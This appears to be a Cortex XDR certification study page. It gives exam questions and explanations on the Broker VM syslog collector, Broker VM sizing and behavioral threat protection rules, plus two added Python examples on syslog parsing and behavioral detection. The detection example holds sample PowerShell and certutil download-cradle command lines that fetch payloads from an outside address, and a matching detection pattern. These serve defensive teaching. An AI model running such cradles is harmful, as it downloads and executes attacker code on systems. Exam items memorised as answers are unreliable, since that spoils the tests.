What functionality of the Broker VM would you use to ingest third-party firewall logs to the Cortex Data Lake?
The Broker VM is a virtual machine you deploy in your own network to broker data between on-premises sources and the Cortex Data Lake. It runs a set of collection applets, including syslog, NetFlow, database and Pathfinder collectors. The Syslog Collector is the functionality to use here: it receives syslog messages from third-party devices (firewalls, routers, switches, servers) and forwards them to the Cortex Data Lake. When you configure the collector you select the vendor and product of the source, so the messages are parsed into structured fields before they are sent on. Because firewall vendors such as Cisco, Fortinet and Check Point can all export logs over syslog, pointing the firewall's syslog forwarder at the Broker VM's Syslog Collector is the standard way to get third-party firewall logs into the data lake, and it gives Cortex XDR visibility and threat detection across the network perimeter. Practical checks before relying on it: make sure the firewall sends on the same protocol (UDP or TCP) and port the collector listens on, allow that traffic through any intermediate firewalls, and confirm the vendor format you chose matches what the device actually emits, otherwise the logs arrive unparsed.
Reference: Supported Third-Party Firewall Vendors
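As an added example (not Palo Alto code and not taken from the page), the snippet below shows what a third-party firewall's syslog forwarder emits and what the Syslog Collector has to undo on the receiving side: RFC 5424 messages, RFC 6587 octet-counted framing over TCP, and a vendor key=value body. The firewall log lines, hostnames and the collector host/port are constructed assumptions; the real port is whatever you configured on the Broker VM.

```python
"""Constructed example: build, frame and parse firewall syslog as it would
travel from a third-party firewall to a Broker VM Syslog Collector.
Not Palo Alto code; the sample events, host names and collector endpoint
are assumptions made for this example."""
import re
import socket
from datetime import datetime, timezone

# Constructed FortiGate-style key=value events (not captured from a real device)
SAMPLE_FW_EVENTS = [
    'date=2024-05-01 time=10:15:32 devname="fw-edge-1" type="traffic" subtype="forward" '
    'srcip=10.20.0.15 dstip=203.0.113.7 dstport=443 action="deny" policyid=12',
    'date=2024-05-01 time=10:15:40 devname="fw-edge-1" type="utm" subtype="ips" '
    'srcip=198.51.100.9 dstip=10.20.0.15 attack="Cobalt.Strike.Beacon" action="dropped"',
]
EXAMPLE_TS = datetime(2024, 5, 1, 10, 15, 32, tzinfo=timezone.utc)


def build_syslog_message(hostname, appname, msg, facility=20, severity=6, ts=None):
    """RFC 5424 message. PRI = facility*8 + severity (local4.info -> 166).
    PROCID, MSGID and STRUCTURED-DATA are sent as the nil value '-'."""
    ts = ts or datetime.now(timezone.utc)
    pri = facility * 8 + severity
    return f"<{pri}>1 {ts.strftime('%Y-%m-%dT%H:%M:%SZ')} {hostname} {appname} - - - {msg}"


def frame_for_tcp(message):
    """RFC 6587 octet counting: 'MSG-LEN SP MSG'. The length is counted in
    bytes, so non-ASCII characters in the body do not shift the boundary."""
    payload = message.encode("utf-8")
    return f"{len(payload)} ".encode("ascii") + payload


def split_frames(stream):
    """Collector side: cut a TCP byte stream back into whole messages.
    A truncated trailing frame raises instead of being silently guessed."""
    messages, i = [], 0
    while i < len(stream):
        sp = stream.index(b" ", i)
        length = int(stream[i:sp])
        start, end = sp + 1, sp + 1 + length
        if end > len(stream):
            raise ValueError("truncated frame")
        messages.append(stream[start:end].decode("utf-8"))
        i = end
    return messages


# Header with nil SD only; a real parser must also handle [id k="v"] blocks.
SYSLOG_5424 = re.compile(r"^<(\d{1,3})>1 (\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (.*)$", re.S)
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_syslog(message):
    """Return header fields plus the vendor key=value body as one flat record."""
    m = SYSLOG_5424.match(message)
    if not m:
        raise ValueError("not an RFC 5424 message")
    pri = int(m.group(1))
    record = {
        "facility": pri // 8, "severity": pri % 8,
        "timestamp": m.group(2), "hostname": m.group(3), "appname": m.group(4),
    }
    record.update({k: v.strip('"') for k, v in KV.findall(m.group(8))})
    return record


def send_to_collector(messages, host, port):
    """Forward framed messages over TCP to the collector (assumed endpoint).
    This sends cleartext; in production put it on a trusted or TLS-protected path."""
    with socket.create_connection((host, port), timeout=5) as s:
        for msg in messages:
            s.sendall(frame_for_tcp(msg))


if __name__ == "__main__":
    msgs = [build_syslog_message("fw-edge-1", "fortigate", e, ts=EXAMPLE_TS) for e in SAMPLE_FW_EVENTS]
    stream = b"".join(frame_for_tcp(m) for m in msgs)
    for rec in map(parse_syslog, split_frames(stream)):
        print(rec["hostname"], rec.get("type"), rec.get("action"), rec.get("attack"))
    # send_to_collector(msgs, "broker-vm.example.internal", 514)  # assumed collector host/port
```

The framing step is where most "logs arrive but look mangled" tickets come from: a device configured for newline-delimited (non-transparent) framing against a collector expecting octet counting, or vice versa, produces exactly the partial records this parser refuses to guess at.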
What is the standard installation disk space recommended to install a Broker VM?
The Broker VM for Cortex XDR is a virtual machine deployed on your own infrastructure that acts as a local hub between your network and the Cortex XDR cloud. Its applets can proxy agent communication for endpoints without direct internet access, cache agent and content updates locally, and collect syslog, NetFlow and other on-premises data for the Cortex Data Lake. The standard installation requirements for the Broker VM are:
CPU: 4 cores
RAM: 8 GB
Disk space: 512 GB
Network: outbound access to the Cortex XDR cloud service and connectivity to the agents and data sources it serves
The disk is where the applets buffer data locally: cached content and agent installers for the agent proxy, and collected syslog or NetFlow records queued while the uplink to Cortex XDR is slow or down. Size it for the number of agents it proxies and the volume of logs it collects, and monitor free space, because a full disk means dropped logs rather than a graceful slowdown.
As a Malware Analyst working with Cortex XDR you notice an alert suggesting that there was a prevented attempt to download Cobalt Strike on one of your servers. Days later, you learn about a massive ongoing supply chain attack. Using Cortex XDR you recognize that your server was compromised by the attack and that Cortex XDR prevented it. What steps can you take to ensure that the same protection is extended to all your servers?
Briefly, why the other option shown here is wrong:
D) Enable Behavioral Threat Protection (BTP) with cytool to prevent the attack from spreading: This is not the correct answer. BTP is the Cortex XDR protection module that detects and blocks malicious or suspicious behavior chains on endpoints, such as file execution, process injection, network connections or registry modifications. Its rules are managed centrally in the Cortex XDR console, not with cytool. cytool is the local command-line tool for operating the agent itself (checking status, collecting logs, troubleshooting, and with the supervisor password stopping or starting the agent); it has no option to author or enable BTP rules. Even if it did, anything done with cytool applies to one host at a time, which is the opposite of extending protection to all servers.
In conclusion, to ensure the same protection is extended to all your servers, create BTP rules that recognize and prevent the observed activity. Rules pushed from the console apply to every endpoint in the targeted profiles, so the behavior that was blocked on one server is blocked fleet-wide, and they match the behavior rather than a single file hash, which a supply chain attacker can change trivially.
[Cytool]
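To make the "match the behavior, not the file" point concrete, here is an added example (not Cortex XDR's rule syntax or engine, and not from the page): a toy behavioral rule evaluated over constructed endpoint telemetry from three servers. The event fields, rule format, process names and command lines are all assumptions made for this example.

```python
"""Constructed example: a toy behavioral rule of the kind the explanation
describes, evaluated over process events from several servers.
This is not Cortex XDR's BTP/BIOC format or engine; events, fields and
rule shape are assumptions made for this example."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    host: str
    pid: int
    ppid: int
    image: str            # lower-case executable name
    cmdline: str = ""


@dataclass
class Rule:
    name: str
    parent_images: set    # the process that spawned the child must be one of these
    child_images: set
    cmdline_pattern: re.Pattern
    action: str = "prevent"   # "prevent" or "detect"


# The behavior seen on the compromised server: a server-side service process
# spawning a scripting/LOLBin tool with a download cradle on its command line.
DOWNLOAD_CRADLE = Rule(
    name="service spawns download cradle",
    parent_images={"w3wp.exe", "tomcat9.exe", "java.exe", "sqlservr.exe"},
    child_images={"powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe"},
    cmdline_pattern=re.compile(
        r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|-urlcache|/transfer|\biex\b)", re.I),
)


def evaluate(rule, events):
    """Return one verdict per event matching the rule. The parent check needs
    the spawning process, so events are indexed by (host, pid) first."""
    by_key = {(e.host, e.pid): e for e in events}
    verdicts = []
    for e in events:
        if e.image not in rule.child_images:
            continue
        parent = by_key.get((e.host, e.ppid))
        if parent is None or parent.image not in rule.parent_images:
            continue
        if not rule.cmdline_pattern.search(e.cmdline):
            continue
        verdicts.append({"rule": rule.name, "host": e.host, "pid": e.pid,
                         "parent": parent.image, "action": rule.action})
    return verdicts


# Constructed telemetry: the same behavior on two servers with different
# tools and payload URLs, plus two benign PowerShell launches on a third.
SAMPLE_EVENTS = [
    Event("srv-web-02", 4012, 1, "w3wp.exe"),
    Event("srv-web-02", 5120, 4012, "powershell.exe",
          "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"),
    Event("srv-app-01", 3300, 1, "java.exe"),
    Event("srv-app-01", 3377, 3300, "certutil.exe",
          "certutil -urlcache -split -f http://203.0.113.7/b.exe b.exe"),
    Event("srv-db-01", 900, 1, "explorer.exe"),
    Event("srv-db-01", 950, 900, "powershell.exe", "powershell -File C:\\ops\\backup.ps1"),
    Event("srv-db-01", 951, 1, "sqlservr.exe"),
    Event("srv-db-01", 990, 951, "powershell.exe", "powershell -c Get-Service"),
]

if __name__ == "__main__":
    for verdict in evaluate(DOWNLOAD_CRADLE, SAMPLE_EVENTS):
        print(verdict)
```

The two servers are caught although they use different tools and different payloads, which is what a hash-based IOC would miss; the benign launches on srv-db-01 pass because either the parent or the command line does not fit the chain. The same trade-off applies to real rules: the parent constraint is what keeps an administrator's PowerShell from being blocked, so test a new prevention rule in detect mode on the fleet first.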
Which of the following protection modules is checked first in the Cortex XDR Windows agent malware protection flow?